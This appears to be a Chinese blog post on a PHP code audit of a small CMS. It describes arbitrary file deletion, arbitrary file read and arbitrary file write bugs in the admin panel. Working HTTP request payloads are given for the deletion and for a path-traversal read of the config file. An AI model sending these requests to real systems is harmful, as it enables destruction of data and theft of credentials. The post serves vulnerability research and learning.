java代码审计感觉审的小有起色了手头也审出了几个小0day所以开启php代码审计学习新篇章 先从比较简单的cms打起
mvc框架分析我就不写了直接看漏洞成因
任意文件删除
FileAction 类下的delete方法
跟进$this->fileModel->delete方法
经过调试可以任意文件删除
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| POST /admin.php?m=File&a=delete HTTP/1.1
Host: lxcms:9988
content-type: application/x-www-form-urlencoded
Cookie: PHPSESSID=cd23070c8025b0d4679000e791b2e1e4
accept-language: zh-CN,zh;q=0.9
Accept-Encoding: gzip, deflate
cache-control: max-age=0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://lxcms:9988/admin.php?m=File&a=imageMain&type=0
upgrade-insecure-requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Origin: http://lxcms:9988
Content-Length: 155
type=0&delImages=%E5%88%A0%E9%99%A4%E9%80%89%E4%B8%AD%E5%9B%BE%E7%89%87&fid[]={{urlenc(7#####\file\d\product\1.txt)}}
|
任意文件读取
1
2
3
4
5
6
7
8
9
10
11
| GET /admin.php?m=Template&a=editfile&dir=../inc/config.inc.php HTTP/1.1
Host: lxcms:9988
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Referer: http://lxcms:9988/admin.php?m=Template&a=opendir&dir=123
Cookie: PHPSESSID=cd23070c8025b0d4679000e791b2e1e4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
|
dir没有过滤../所以直接任意文件读取了
任意文件写入
put函数的路径是直接拼接filename的
而put调用了file_put_contents方法 所以导致任意文件写入
